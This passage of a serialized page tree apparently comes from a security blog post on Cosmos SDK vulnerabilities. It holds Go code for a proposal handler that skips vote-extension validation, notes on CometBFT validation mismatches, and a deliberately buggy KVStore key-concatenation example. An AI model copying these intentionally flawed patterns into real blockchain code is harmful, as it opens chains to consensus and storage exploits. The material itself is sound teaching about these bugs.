}\n}\n",[90758],{"type":24,"tag":145,"props":90759,"children":90760},{"__ignoreMap":7},[90761,90815,90906,90913,90934,91001,91009,91113,91136,91155,91162,91216,91239,91294,91313,91320,91327,91334,91388,91395,91421,91444,91496,91558,91565,91592,91612,91624,91631],{"type":24,"tag":301,"props":90762,"children":90763},{"class":303,"line":304},[90764,90768,90772,90777,90781,90786,90790,90795,90799,90803,90807,90811],{"type":24,"tag":301,"props":90765,"children":90766},{"style":348},[90767],{"type":30,"value":83013},{"type":24,"tag":301,"props":90769,"children":90770},{"style":359},[90771],{"type":30,"value":873},{"type":24,"tag":301,"props":90773,"children":90774},{"style":369},[90775],{"type":30,"value":90776},"h ",{"type":24,"tag":301,"props":90778,"children":90779},{"style":385},[90780],{"type":30,"value":772},{"type":24,"tag":301,"props":90782,"children":90783},{"style":10246},[90784],{"type":30,"value":90785},"Handlers",{"type":24,"tag":301,"props":90787,"children":90788},{"style":359},[90789],{"type":30,"value":911},{"type":24,"tag":301,"props":90791,"children":90792},{"style":314},[90793],{"type":30,"value":90794},"PrepareProposalHandler",{"type":24,"tag":301,"props":90796,"children":90797},{"style":359},[90798],{"type":30,"value":20835},{"type":24,"tag":301,"props":90800,"children":90801},{"style":10246},[90802],{"type":30,"value":85442},{"type":24,"tag":301,"props":90804,"children":90805},{"style":359},[90806],{"type":30,"value":206},{"type":24,"tag":301,"props":90808,"children":90809},{"style":10246},[90810],{"type":30,"value":90794},{"type":24,"tag":301,"props":90812,"children":90813},{"style":359},[90814],{"type":30,"value":3035},{"type":24,"tag":301,"props":90816,"children":90817},{"class":303,"line":320},[90818,90822,90826,90830,90834,90838,90842,90846,90850,90855,90859,90864,90868,90873,90877,90881,90885,90889,90894,90898,90902],{"type":24,"tag":301,"props":90819,"children":90820},{"style":308},[90821],{"type":30,"value":680},{"type":24,"tag":301,"props":90823,"children":90824},{"style":348},[90825],{"type":30,"value":86721},{"type":24,"tag":301,"props":90827,"children":90828},{"style":359},[90829],{"type":30,"value":362},{"type":24,"tag":301,"props":90831,"children":90832},{"style":369},[90833],{"type":30,"value":27051},{"type":24,"tag":301,"props":90835,"children":90836},{"style":10246},[90837],{"type":30,"value":85353},{"type":24,"tag":301,"props":90839,"children":90840},{"style":359},[90841],{"type":30,"value":206},{"type":24,"tag":301,"props":90843,"children":90844},{"style":10246},[90845],{"type":30,"value":83062},{"type":24,"tag":301,"props":90847,"children":90848},{"style":359},[90849],{"type":30,"value":377},{"type":24,"tag":301,"props":90851,"children":90852},{"style":369},[90853],{"type":30,"value":90854},"req",{"type":24,"tag":301,"props":90856,"children":90857},{"style":385},[90858],{"type":30,"value":431},{"type":24,"tag":301,"props":90860,"children":90861},{"style":10246},[90862],{"type":30,"value":90863},"abcitypes",{"type":24,"tag":301,"props":90865,"children":90866},{"style":359},[90867],{"type":30,"value":206},{"type":24,"tag":301,"props":90869,"children":90870},{"style":10246},[90871],{"type":30,"value":90872},"RequestPrepareProposal",{"type":24,"tag":301,"props":90874,"children":90875},{"style":359},[90876],{"type":30,"value":83095},{"type":24,"tag":301,"props":90878,"children":90879},{"style":385},[90880],{"type":30,"value":772},{"type":24,"tag":301,"props":90882,"children":90883},{"style":10246},[90884],{"type":30,"value":90863},{"type":24,"tag":301,"props":90886,"children":90887},{"style":359},[90888],{"type":30,"value":206},{"type":24,"tag":301,"props":90890,"children":90891},{"style":10246},[90892],{"type":30,"value":90893},"ResponsePrepareProposal",{"type":24,"tag":301,"props":90895,"children":90896},{"style":359},[90897],{"type":30,"value":377},{"type":24,"tag":301,"props":90899,"children":90900},{"style":10246},[90901],{"type":30,"value":21654},{"type":24,"tag":301,"props":90903,"children":90904},{"style":359},[90905],{"type":30,"value":398},{"type":24,"tag":301,"props":90907,"children":90908},{"class":303,"line":335},[90909],{"type":24,"tag":301,"props":90910,"children":90911},{"style":385},[90912],{"type":30,"value":88547},{"type":24,"tag":301,"props":90914,"children":90915},{"class":303,"line":344},[90916,90920,90925,90929],{"type":24,"tag":301,"props":90917,"children":90918},{"style":348},[90919],{"type":30,"value":86830},{"type":24,"tag":301,"props":90921,"children":90922},{"style":369},[90923],{"type":30,"value":90924}," injection",{"type":24,"tag":301,"props":90926,"children":90927},{"style":359},[90928],{"type":30,"value":82940},{"type":24,"tag":301,"props":90930,"children":90931},{"style":10246},[90932],{"type":30,"value":90933},"byte\n",{"type":24,"tag":301,"props":90935,"children":90936},{"class":303,"line":401},[90937,90941,90946,90950,90954,90958,90962,90966,90970,90974,90979,90983,90988,90992,90997],{"type":24,"tag":301,"props":90938,"children":90939},{"style":308},[90940],{"type":30,"value":3285},{"type":24,"tag":301,"props":90942,"children":90943},{"style":369},[90944],{"type":30,"value":90945}," req",{"type":24,"tag":301,"props":90947,"children":90948},{"style":359},[90949],{"type":30,"value":206},{"type":24,"tag":301,"props":90951,"children":90952},{"style":369},[90953],{"type":30,"value":90184},{"type":24,"tag":301,"props":90955,"children":90956},{"style":385},[90957],{"type":30,"value":20986},{"type":24,"tag":301,"props":90959,"children":90960},{"style":369},[90961],{"type":30,"value":32599},{"type":24,"tag":301,"props":90963,"children":90964},{"style":359},[90965],{"type":30,"value":206},{"type":24,"tag":301,"props":90967,"children":90968},{"style":314},[90969],{"type":30,"value":90385},{"type":24,"tag":301,"props":90971,"children":90972},{"style":359},[90973],{"type":30,"value":36924},{"type":24,"tag":301,"props":90975,"children":90976},{"style":369},[90977],{"type":30,"value":90978},"Abci",{"type":24,"tag":301,"props":90980,"children":90981},{"style":359},[90982],{"type":30,"value":206},{"type":24,"tag":301,"props":90984,"children":90985},{"style":369},[90986],{"type":30,"value":90987},"VoteExtensionsEnableHeight",{"type":24,"tag":301,"props":90989,"children":90990},{"style":385},[90991],{"type":30,"value":20977},{"type":24,"tag":301,"props":90993,"children":90994},{"style":369},[90995],{"type":30,"value":90996}," collectSigs",{"type":24,"tag":301,"props":90998,"children":90999},{"style":359},[91000],{"type":30,"value":3035},{"type":24,"tag":301,"props":91002,"children":91003},{"class":303,"line":415},[91004],{"type":24,"tag":301,"props":91005,"children":91006},{"style":1062},[91007],{"type":30,"value":91008}," //Fails to verify vote extensions with VerifyVoteExtension rules\n",{"type":24,"tag":301,"props":91010,"children":91011},{"class":303,"line":439},[91012,91016,91020,91025,91029,91034,91038,91042,91046,91050,91054,91059,91063,91067,91071,91075,91079,91083,91087,91092,91096,91100,91104,91109],{"type":24,"tag":301,"props":91013,"children":91014},{"style":369},[91015],{"type":30,"value":89041},{"type":24,"tag":301,"props":91017,"children":91018},{"style":385},[91019],{"type":30,"value":83129},{"type":24,"tag":301,"props":91021,"children":91022},{"style":369},[91023],{"type":30,"value":91024}," baseapp",{"type":24,"tag":301,"props":91026,"children":91027},{"style":359},[91028],{"type":30,"value":206},{"type":24,"tag":301,"props":91030,"children":91031},{"style":314},[91032],{"type":30,"value":91033},"ValidateVoteExtensions",{"type":24,"tag":301,"props":91035,"children":91036},{"style":359},[91037],{"type":30,"value":362},{"type":24,"tag":301,"props":91039,"children":91040},{"style":369},[91041],{"type":30,"value":27051},{"type":24,"tag":301,"props":91043,"children":91044},{"style":359},[91045],{"type":30,"value":377},{"type":24,"tag":301,"props":91047,"children":91048},{"style":369},[91049],{"type":30,"value":2597},{"type":24,"tag":301,"props":91051,"children":91052},{"style":359},[91053],{"type":30,"value":206},{"type":24,"tag":301,"props":91055,"children":91056},{"style":369},[91057],{"type":30,"value":91058},"stakingKeeper",{"type":24,"tag":301,"props":91060,"children":91061},{"style":359},[91062],{"type":30,"value":377},{"type":24,"tag":301,"props":91064,"children":91065},{"style":369},[91066],{"type":30,"value":90854},{"type":24,"tag":301,"props":91068,"children":91069},{"style":359},[91070],{"type":30,"value":206},{"type":24,"tag":301,"props":91072,"children":91073},{"style":369},[91074],{"type":30,"value":90184},{"type":24,"tag":301,"props":91076,"children":91077},{"style":359},[91078],{"type":30,"value":377},{"type":24,"tag":301,"props":91080,"children":91081},{"style":369},[91082],{"type":30,"value":27051},{"type":24,"tag":301,"props":91084,"children":91085},{"style":359},[91086],{"type":30,"value":206},{"type":24,"tag":301,"props":91088,"children":91089},{"style":314},[91090],{"type":30,"value":91091},"ChainID",{"type":24,"tag":301,"props":91093,"children":91094},{"style":359},[91095],{"type":30,"value":25153},{"type":24,"tag":301,"props":91097,"children":91098},{"style":369},[91099],{"type":30,"value":90854},{"type":24,"tag":301,"props":91101,"children":91102},{"style":359},[91103],{"type":30,"value":206},{"type":24,"tag":301,"props":91105,"children":91106},{"style":369},[91107],{"type":30,"value":91108},"LocalLastCommit",{"type":24,"tag":301,"props":91110,"children":91111},{"style":359},[91112],{"type":30,"value":791},{"type":24,"tag":301,"props":91114,"children":91115},{"class":303,"line":447},[91116,91120,91124,91128,91132],{"type":24,"tag":301,"props":91117,"children":91118},{"style":308},[91119],{"type":30,"value":65516},{"type":24,"tag":301,"props":91121,"children":91122},{"style":369},[91123],{"type":30,"value":55255},{"type":24,"tag":301,"props":91125,"children":91126},{"style":385},[91127],{"type":30,"value":71098},{"type":24,"tag":301,"props":91129,"children":91130},{"style":348},[91131],{"type":30,"value":88623},{"type":24,"tag":301,"props":91133,"children":91134},{"style":359},[91135],{"type":30,"value":3035},{"type":24,"tag":301,"props":91137,"children":91138},{"class":303,"line":476},[91139,91143,91147,91151],{"type":24,"tag":301,"props":91140,"children":91141},{"style":308},[91142],{"type":30,"value":67441},{"type":24,"tag":301,"props":91144,"children":91145},{"style":348},[91146],{"type":30,"value":88623},{"type":24,"tag":301,"props":91148,"children":91149},{"style":359},[91150],{"type":30,"value":377},{"type":24,"tag":301,"props":91152,"children":91153},{"style":369},[91154],{"type":30,"value":90344},{"type":24,"tag":301,"props":91156,"children":91157},{"class":303,"line":495},[91158],{"type":24,"tag":301,"props":91159,"children":91160},{"style":359},[91161],{"type":30,"value":65600},{"type":24,"tag":301,"props":91163,"children":91164},{"class":303,"line":504},[91165,91170,91174,91178,91182,91187,91191,91196,91200,91204,91208,91212],{"type":24,"tag":301,"props":91166,"children":91167},{"style":369},[91168],{"type":30,"value":91169}," injection",{"type":24,"tag":301,"props":91171,"children":91172},{"style":359},[91173],{"type":30,"value":377},{"type":24,"tag":301,"props":91175,"children":91176},{"style":369},[91177],{"type":30,"value":55155},{"type":24,"tag":301,"props":91179,"children":91180},{"style":385},[91181],{"type":30,"value":2537},{"type":24,"tag":301,"props":91183,"children":91184},{"style":369},[91185],{"type":30,"value":91186}," json",{"type":24,"tag":301,"props":91188,"children":91189},{"style":359},[91190],{"type":30,"value":206},{"type":24,"tag":301,"props":91192,"children":91193},{"style":314},[91194],{"type":30,"value":91195},"Marshal",{"type":24,"tag":301,"props":91197,"children":91198},{"style":359},[91199],{"type":30,"value":362},{"type":24,"tag":301,"props":91201,"children":91202},{"style":369},[91203],{"type":30,"value":90854},{"type":24,"tag":301,"props":91205,"children":91206},{"style":359},[91207],{"type":30,"value":206},{"type":24,"tag":301,"props":91209,"children":91210},{"style":369},[91211],{"type":30,"value":91108},{"type":24,"tag":301,"props":91213,"children":91214},{"style":359},[91215],{"type":30,"value":791},{"type":24,"tag":301,"props":91217,"children":91218},{"class":303,"line":512},[91219,91223,91227,91231,91235],{"type":24,"tag":301,"props":91220,"children":91221},{"style":308},[91222],{"type":30,"value":65516},{"type":24,"tag":301,"props":91224,"children":91225},{"style":369},[91226],{"type":30,"value":55255},{"type":24,"tag":301,"props":91228,"children":91229},{"style":385},[91230],{"type":30,"value":71098},{"type":24,"tag":301,"props":91232,"children":91233},{"style":348},[91234],{"type":30,"value":88623},{"type":24,"tag":301,"props":91236,"children":91237},{"style":359},[91238],{"type":30,"value":3035},{"type":24,"tag":301,"props":91240,"children":91241},{"class":303,"line":592},[91242,91247,91251,91256,91260,91264,91268,91273,91277,91282,91286,91290],{"type":24,"tag":301,"props":91243,"children":91244},{"style":369},[91245],{"type":30,"value":91246}," h",{"type":24,"tag":301,"props":91248,"children":91249},{"style":359},[91250],{"type":30,"value":206},{"type":24,"tag":301,"props":91252,"children":91253},{"style":369},[91254],{"type":30,"value":91255},"logger",{"type":24,"tag":301,"props":91257,"children":91258},{"style":359},[91259],{"type":30,"value":206},{"type":24,"tag":301,"props":91261,"children":91262},{"style":314},[91263],{"type":30,"value":44138},{"type":24,"tag":301,"props":91265,"children":91266},{"style":359},[91267],{"type":30,"value":362},{"type":24,"tag":301,"props":91269,"children":91270},{"style":329},[91271],{"type":30,"value":91272},"\"failed to marshal extended votes\"",{"type":24,"tag":301,"props":91274,"children":91275},{"style":359},[91276],{"type":30,"value":377},{"type":24,"tag":301,"props":91278,"children":91279},{"style":329},[91280],{"type":30,"value":91281},"\"err\"",{"type":24,"tag":301,"props":91283,"children":91284},{"style":359},[91285],{"type":30,"value":377},{"type":24,"tag":301,"props":91287,"children":91288},{"style":369},[91289],{"type":30,"value":55155},{"type":24,"tag":301,"props":91291,"children":91292},{"style":359},[91293],{"type":30,"value":791},{"type":24,"tag":301,"props":91295,"children":91296},{"class":303,"line":619},[91297,91301,91305,91309],{"type":24,"tag":301,"props":91298,"children":91299},{"style":308},[91300],{"type":30,"value":67441},{"type":24,"tag":301,"props":91302,"children":91303},{"style":348},[91304],{"type":30,"value":88623},{"type":24,"tag":301,"props":91306,"children":91307},{"style":359},[91308],{"type":30,"value":377},{"type":24,"tag":301,"props":91310,"children":91311},{"style":369},[91312],{"type":30,"value":90344},{"type":24,"tag":301,"props":91314,"children":91315},{"class":303,"line":635},[91316],{"type":24,"tag":301,"props":91317,"children":91318},{"style":359},[91319],{"type":30,"value":65600},{"type":24,"tag":301,"props":91321,"children":91322},{"class":303,"line":643},[91323],{"type":24,"tag":301,"props":91324,"children":91325},{"style":385},[91326],{"type":30,"value":89223},{"type":24,"tag":301,"props":91328,"children":91329},{"class":303,"line":652},[91330],{"type":24,"tag":301,"props":91331,"children":91332},{"style":359},[91333],{"type":30,"value":3345},{"type":24,"tag":301,"props":91335,"children":91336},{"class":303,"line":666},[91337,91342,91346,91350,91354,91359,91363,91368,91372,91376,91380,91384],{"type":24,"tag":301,"props":91338,"children":91339},{"style":369},[91340],{"type":30,"value":91341}," defaultRes",{"type":24,"tag":301,"props":91343,"children":91344},{"style":359},[91345],{"type":30,"value":377},{"type":24,"tag":301,"props":91347,"children":91348},{"style":369},[91349],{"type":30,"value":55155},{"type":24,"tag":301,"props":91351,"children":91352},{"style":385},[91353],{"type":30,"value":83129},{"type":24,"tag":301,"props":91355,"children":91356},{"style":369},[91357],{"type":30,"value":91358}," h",{"type":24,"tag":301,"props":91360,"children":91361},{"style":359},[91362],{"type":30,"value":206},{"type":24,"tag":301,"props":91364,"children":91365},{"style":314},[91366],{"type":30,"value":91367},"defaultPrepareProposal",{"type":24,"tag":301,"props":91369,"children":91370},{"style":359},[91371],{"type":30,"value":362},{"type":24,"tag":301,"props":91373,"children":91374},{"style":369},[91375],{"type":30,"value":27051},{"type":24,"tag":301,"props":91377,"children":91378},{"style":359},[91379],{"type":30,"value":377},{"type":24,"tag":301,"props":91381,"children":91382},{"style":369},[91383],{"type":30,"value":90854},{"type":24,"tag":301,"props":91385,"children":91386},{"style":359},[91387],{"type":30,"value":791},{"type":24,"tag":301,"props":91389,"children":91390},{"class":303,"line":674},[91391],{"type":24,"tag":301,"props":91392,"children":91393},{"style":385},[91394],{"type":30,"value":88547},{"type":24,"tag":301,"props":91396,"children":91397},{"class":303,"line":692},[91398,91403,91407,91412,91416],{"type":24,"tag":301,"props":91399,"children":91400},{"style":369},[91401],{"type":30,"value":91402}," proposalTxs",{"type":24,"tag":301,"props":91404,"children":91405},{"style":385},[91406],{"type":30,"value":83129},{"type":24,"tag":301,"props":91408,"children":91409},{"style":369},[91410],{"type":30,"value":91411}," defaultRes",{"type":24,"tag":301,"props":91413,"children":91414},{"style":359},[91415],{"type":30,"value":206},{"type":24,"tag":301,"props":91417,"children":91418},{"style":369},[91419],{"type":30,"value":91420},"Txs\n",{"type":24,"tag":301,"props":91422,"children":91423},{"class":303,"line":3631},[91424,91428,91432,91436,91440],{"type":24,"tag":301,"props":91425,"children":91426},{"style":308},[91427],{"type":30,"value":3285},{"type":24,"tag":301,"props":91429,"children":91430},{"style":369},[91431],{"type":30,"value":90924},{"type":24,"tag":301,"props":91433,"children":91434},{"style":385},[91435],{"type":30,"value":71098},{"type":24,"tag":301,"props":91437,"children":91438},{"style":348},[91439],{"type":30,"value":88623},{"type":24,"tag":301,"props":91441,"children":91442},{"style":359},[91443],{"type":30,"value":3035},{"type":24,"tag":301,"props":91445,"children":91446},{"class":303,"line":3639},[91447,91452,91456,91460,91465,91470,91474,91479,91483,91488,91492],{"type":24,"tag":301,"props":91448,"children":91449},{"style":369},[91450],{"type":30,"value":91451}," proposalTxs",{"type":24,"tag":301,"props":91453,"children":91454},{"style":385},[91455],{"type":30,"value":2537},{"type":24,"tag":301,"props":91457,"children":91458},{"style":314},[91459],{"type":30,"value":84408},{"type":24,"tag":301,"props":91461,"children":91462},{"style":359},[91463],{"type":30,"value":91464},"([][]",{"type":24,"tag":301,"props":91466,"children":91467},{"style":10246},[91468],{"type":30,"value":91469},"byte",{"type":24,"tag":301,"props":91471,"children":91472},{"style":359},[91473],{"type":30,"value":83330},{"type":24,"tag":301,"props":91475,"children":91476},{"style":369},[91477],{"type":30,"value":91478},"injection",{"type":24,"tag":301,"props":91480,"children":91481},{"style":359},[91482],{"type":30,"value":83349},{"type":24,"tag":301,"props":91484,"children":91485},{"style":369},[91486],{"type":30,"value":91487},"proposalTxs",{"type":24,"tag":301,"props":91489,"children":91490},{"style":385},[91491],{"type":30,"value":4054},{"type":24,"tag":301,"props":91493,"children":91494},{"style":359},[91495],{"type":30,"value":791},{"type":24,"tag":301,"props":91497,"children":91498},{"class":303,"line":3647},[91499,91504,91508,91512,91516,91520,91524,91529,91533,91538,91542,91546,91550,91554],{"type":24,"tag":301,"props":91500,"children":91501},{"style":369},[91502],{"type":30,"value":91503}," h",{"type":24,"tag":301,"props":91505,"children":91506},{"style":359},[91507],{"type":30,"value":206},{"type":24,"tag":301,"props":91509,"children":91510},{"style":369},[91511],{"type":30,"value":91255},{"type":24,"tag":301,"props":91513,"children":91514},{"style":359},[91515],{"type":30,"value":206},{"type":24,"tag":301,"props":91517,"children":91518},{"style":314},[91519],{"type":30,"value":31466},{"type":24,"tag":301,"props":91521,"children":91522},{"style":359},[91523],{"type":30,"value":362},{"type":24,"tag":301,"props":91525,"children":91526},{"style":329},[91527],{"type":30,"value":91528},"\"injected local last commit\"",{"type":24,"tag":301,"props":91530,"children":91531},{"style":359},[91532],{"type":30,"value":377},{"type":24,"tag":301,"props":91534,"children":91535},{"style":329},[91536],{"type":30,"value":91537},"\"height\"",{"type":24,"tag":301,"props":91539,"children":91540},{"style":359},[91541],{"type":30,"value":377},{"type":24,"tag":301,"props":91543,"children":91544},{"style":369},[91545],{"type":30,"value":90854},{"type":24,"tag":301,"props":91547,"children":91548},{"style":359},[91549],{"type":30,"value":206},{"type":24,"tag":301,"props":91551,"children":91552},{"style":369},[91553],{"type":30,"value":90184},{"type":24,"tag":301,"props":91555,"children":91556},{"style":359},[91557],{"type":30,"value":791},{"type":24,"tag":301,"props":91559,"children":91560},{"class":303,"line":3685},[91561],{"type":24,"tag":301,"props":91562,"children":91563},{"style":359},[91564],{"type":30,"value":3345},{"type":24,"tag":301,"props":91566,"children":91567},{"class":303,"line":3713},[91568,91572,91576,91580,91584,91588],{"type":24,"tag":301,"props":91569,"children":91570},{"style":308},[91571],{"type":30,"value":482},{"type":24,"tag":301,"props":91573,"children":91574},{"style":385},[91575],{"type":30,"value":991},{"type":24,"tag":301,"props":91577,"children":91578},{"style":10246},[91579],{"type":30,"value":90863},{"type":24,"tag":301,"props":91581,"children":91582},{"style":359},[91583],{"type":30,"value":206},{"type":24,"tag":301,"props":91585,"children":91586},{"style":10246},[91587],{"type":30,"value":90893},{"type":24,"tag":301,"props":91589,"children":91590},{"style":359},[91591],{"type":30,"value":799},{"type":24,"tag":301,"props":91593,"children":91594},{"class":303,"line":3721},[91595,91600,91604,91608],{"type":24,"tag":301,"props":91596,"children":91597},{"style":369},[91598],{"type":30,"value":91599}," Txs",{"type":24,"tag":301,"props":91601,"children":91602},{"style":359},[91603],{"type":30,"value":5615},{"type":24,"tag":301,"props":91605,"children":91606},{"style":369},[91607],{"type":30,"value":91487},{"type":24,"tag":301,"props":91609,"children":91610},{"style":359},[91611],{"type":30,"value":1729},{"type":24,"tag":301,"props":91613,"children":91614},{"class":303,"line":3751},[91615,91620],{"type":24,"tag":301,"props":91616,"children":91617},{"style":359},[91618],{"type":30,"value":91619}," }, ",{"type":24,"tag":301,"props":91621,"children":91622},{"style":348},[91623],{"type":30,"value":83354},{"type":24,"tag":301,"props":91625,"children":91626},{"class":303,"line":3782},[91627],{"type":24,"tag":301,"props":91628,"children":91629},{"style":359},[91630],{"type":30,"value":501},{"type":24,"tag":301,"props":91632,"children":91633},{"class":303,"line":3791},[91634],{"type":24,"tag":301,"props":91635,"children":91636},{"style":359},[91637],{"type":30,"value":698},{"type":24,"tag":32,"props":91639,"children":91640},{},[91641,91643,91648,91649,91654,91656,91663],{"type":30,"value":91642},"Aside from the more complex variant, pure validation mismatches are also still prevalent despite being a well-known attack surface. This stems from ",{"type":24,"tag":145,"props":91644,"children":91646},{"className":91645},[],[91647],{"type":30,"value":90013},{"type":30,"value":873},{"type":24,"tag":145,"props":91650,"children":91652},{"className":91651},[],[91653],{"type":30,"value":90081},{"type":30,"value":91655},") rejections by various obscure checks hidden within CometBTF. For example, this commit fixes a bug where ",{"type":24,"tag":188,"props":91657,"children":91660},{"href":91658,"rel":91659},"https://github.com/babylonlabs-io/babylon/commit/aa827f875a16ebf85efee5d9a6c8c4e76dbfb7bd#diff-77659089b31367690393a968f4bfacfd1bf960ed300965729df216a6fb612699",[192],[91661],{"type":30,"value":91662},"PrepareProposal may return a Proposal larger than MaxTxBytes",{"type":30,"value":91664},", which will later get rejected by CometBTF.",{"type":24,"tag":43,"props":91666,"children":91668},{"id":91667},"the-keymaker",[91669],{"type":30,"value":91670},"The Keymaker",{"type":24,"tag":32,"props":91672,"children":91673},{},[91674,91676,91682,91684,91689],{"type":30,"value":91675},"States (persistent storage) are another crucial component in state machines. Cosmos relies on a custom key-value storage called",{"type":24,"tag":145,"props":91677,"children":91679},{"className":91678},[],[91680],{"type":30,"value":91681},"KVStore",{"type":30,"value":91683}," to handle states efficently. In ",{"type":24,"tag":145,"props":91685,"children":91687},{"className":91686},[],[91688],{"type":30,"value":91681},{"type":30,"value":91690},", keys and values are both represented as simple byte slices, requiring developers to handle serialization and deserialization of more intricate structures when working with storage.",{"type":24,"tag":32,"props":91692,"children":91693},{},[91694],{"type":30,"value":91695},"The complexity behind proper data serialization often results in flawed code and security vulnerabilities. Below, we showcase relatively simple (but buggy) implementations and progressively address and mitigate the issues until the code is deemed safe from exploits.",{"type":24,"tag":32,"props":91697,"children":91698},{},[91699,91701,91707],{"type":30,"value":91700},"Let's start by considering a scenario where we need to store the ",{"type":24,"tag":145,"props":91702,"children":91704},{"className":91703},[],[91705],{"type":30,"value":91706},"positionMap",{"type":30,"value":91708}," structure mentioned below into storage.",{"type":24,"tag":291,"props":91710,"children":91712},{"code":91711,"language":82877,"meta":7,"className":82878,"style":7},"type VaultId uint64\ntype Username string\ntype PositionName string\ntype Position struct {\n data []byte\n}\ntype PositionMap :=\n map[VaultId]map[Username]map[PositionName]Position\n",[91713],{"type":24,"tag":145,"props":91714,"children":91715},{"__ignoreMap":7},[91716,91732,91748,91764,91783,91798,91805,91822],{"type":24,"tag":301,"props":91717,"children":91718},{"class":303,"line":304},[91719,91723,91728],{"type":24,"tag":301,"props":91720,"children":91721},{"style":348},[91722],{"type":30,"value":7026},{"type":24,"tag":301,"props":91724,"children":91725},{"style":10246},[91726],{"type":30,"value":91727}," VaultId",{"type":24,"tag":301,"props":91729,"children":91730},{"style":10246},[91731],{"type":30,"value":82915},{"type":24,"tag":301,"props":91733,"children":91734},{"class":303,"line":320},[91735,91739,91744],{"type":24,"tag":301,"props":91736,"children":91737},{"style":348},[91738],{"type":30,"value":7026},{"type":24,"tag":301,"props":91740,"children":91741},{"style":10246},[91742],{"type":30,"value":91743}," Username",{"type":24,"tag":301,"props":91745,"children":91746},{"style":10246},[91747],{"type":30,"value":3015},{"type":24,"tag":301,"props":91749,"children":91750},{"class":303,"line":335},[91751,91755,91760],{"type":24,"tag":301,"props":91752,"children":91753},{"style":348},[91754],{"type":30,"value":7026},{"type":24,"tag":301,"props":91756,"children":91757},{"style":10246},[91758],{"type":30,"value":91759}," PositionName",{"type":24,"tag":301,"props":91761,"children":91762},{"style":10246},[91763],{"type":30,"value":3015},{"type":24,"tag":301,"props":91765,"children":91766},{"class":303,"line":344},[91767,91771,91775,91779],{"type":24,"tag":301,"props":91768,"children":91769},{"style":348},[91770],{"type":30,"value":7026},{"type":24,"tag":301,"props":91772,"children":91773},{"style":10246},[91774],{"type":30,"value":14241},{"type":24,"tag":301,"props":91776,"children":91777},{"style":348},[91778],{"type":30,"value":27920},{"type":24,"tag":301,"props":91780,"children":91781},{"style":359},[91782],{"type":30,"value":3035},{"type":24,"tag":301,"props":91784,"children":91785},{"class":303,"line":401},[91786,91790,91794],{"type":24,"tag":301,"props":91787,"children":91788},{"style":369},[91789],{"type":30,"value":49968},{"type":24,"tag":301,"props":91791,"children":91792},{"style":359},[91793],{"type":30,"value":82940},{"type":24,"tag":301,"props":91795,"children":91796},{"style":10246},[91797],{"type":30,"value":90933},{"type":24,"tag":301,"props":91799,"children":91800},{"class":303,"line":415},[91801],{"type":24,"tag":301,"props":91802,"children":91803},{"style":359},[91804],{"type":30,"value":698},{"type":24,"tag":301,"props":91806,"children":91807},{"class":303,"line":439},[91808,91812,91817],{"type":24,"tag":301,"props":91809,"children":91810},{"style":348},[91811],{"type":30,"value":7026},{"type":24,"tag":301,"props":91813,"children":91814},{"style":10246},[91815],{"type":30,"value":91816}," PositionMap",{"type":24,"tag":301,"props":91818,"children":91819},{"style":385},[91820],{"type":30,"value":91821}," :=\n",{"type":24,"tag":301,"props":91823,"children":91824},{"class":303,"line":447},[91825,91830,91834,91839,91843,91847,91851,91856,91860,91864,91868,91873,91877],{"type":24,"tag":301,"props":91826,"children":91827},{"style":348},[91828],{"type":30,"value":91829}," map",{"type":24,"tag":301,"props":91831,"children":91832},{"style":359},[91833],{"type":30,"value":541},{"type":24,"tag":301,"props":91835,"children":91836},{"style":10246},[91837],{"type":30,"value":91838},"VaultId",{"type":24,"tag":301,"props":91840,"children":91841},{"style":359},[91842],{"type":30,"value":22200},{"type":24,"tag":301,"props":91844,"children":91845},{"style":348},[91846],{"type":30,"value":73814},{"type":24,"tag":301,"props":91848,"children":91849},{"style":359},[91850],{"type":30,"value":541},{"type":24,"tag":301,"props":91852,"children":91853},{"style":10246},[91854],{"type":30,"value":91855},"Username",{"type":24,"tag":301,"props":91857,"children":91858},{"style":359},[91859],{"type":30,"value":22200},{"type":24,"tag":301,"props":91861,"children":91862},{"style":348},[91863],{"type":30,"value":73814},{"type":24,"tag":301,"props":91865,"children":91866},{"style":359},[91867],{"type":30,"value":541},{"type":24,"tag":301,"props":91869,"children":91870},{"style":10246},[91871],{"type":30,"value":91872},"PositionName",{"type":24,"tag":301,"props":91874,"children":91875},{"style":359},[91876],{"type":30,"value":22200},{"type":24,"tag":301,"props":91878,"children":91879},{"style":10246},[91880],{"type":30,"value":91881},"Position\n",{"type":24,"tag":32,"props":91883,"children":91884},{},[91885,91887,91893],{"type":30,"value":91886},"Given that there are two levels of keys in ",{"type":24,"tag":145,"props":91888,"children":91890},{"className":91889},[],[91891],{"type":30,"value":91892},"PositionMap",{"type":30,"value":91894},", we should try to serialize these three map keys into a hierarchically searchable storage key. The most straightforward mitigation is to convert all fields into strings and concat them together.",{"type":24,"tag":291,"props":91896,"children":91898},{"code":91897,"language":82877,"meta":7,"className":82878,"style":7},"storageKey := fmt.Sprintf(\n \"%d%s%s\",\n vaultId,\n username,\n positionName,\n)\n",[91899],{"type":24,"tag":145,"props":91900,"children":91901},{"__ignoreMap":7},[91902,91931,91943,91955,91967,91979],{"type":24,"tag":301,"props":91903,"children":91904},{"class":303,"line":304},[91905,91910,91914,91918,91922,91927],{"type":24,"tag":301,"props":91906,"children":91907},{"style":369},[91908],{"type":30,"value":91909},"storageKey",{"type":24,"tag":301,"props":91911,"children":91912},{"style":385},[91913],{"type":30,"value":83129},{"type":24,"tag":301,"props":91915,"children":91916},{"style":369},[91917],{"type":30,"value":88939},{"type":24,"tag":301,"props":91919,"children":91920},{"style":359},[91921],{"type":30,"value":206},{"type":24,"tag":301,"props":91923,"children":91924},{"style":314},[91925],{"type":30,"value":91926},"Sprintf",{"type":24,"tag":301,"props":91928,"children":91929},{"style":359},[91930],{"type":30,"value":1707},{"type":24,"tag":301,"props":91932,"children":91933},{"class":303,"line":320},[91934,91939],{"type":24,"tag":301,"props":91935,"children":91936},{"style":329},[91937],{"type":30,"value":91938}," \"%d%s%s\"",{"type":24,"tag":301,"props":91940,"children":91941},{"style":359},[91942],{"type":30,"value":1729},{"type":24,"tag":301,"props":91944,"children":91945},{"class":303,"line":335},[91946,91951],{"type":24,"tag":301,"props":91947,"children":91948},{"style":369},[91949],{"type":30,"value":91950}," vaultId",{"type":24,"tag":301,"props":91952,"children":91953},{"style":359},[91954],{"type":30,"value":1729},{"type":24,"tag":301,"props":91956,"children":91957},{"class":303,"line":344},[91958,91963],{"type":24,"tag":301,"props":91959,"children":91960},{"style":369},[91961],{"type":30,"value":91962}," 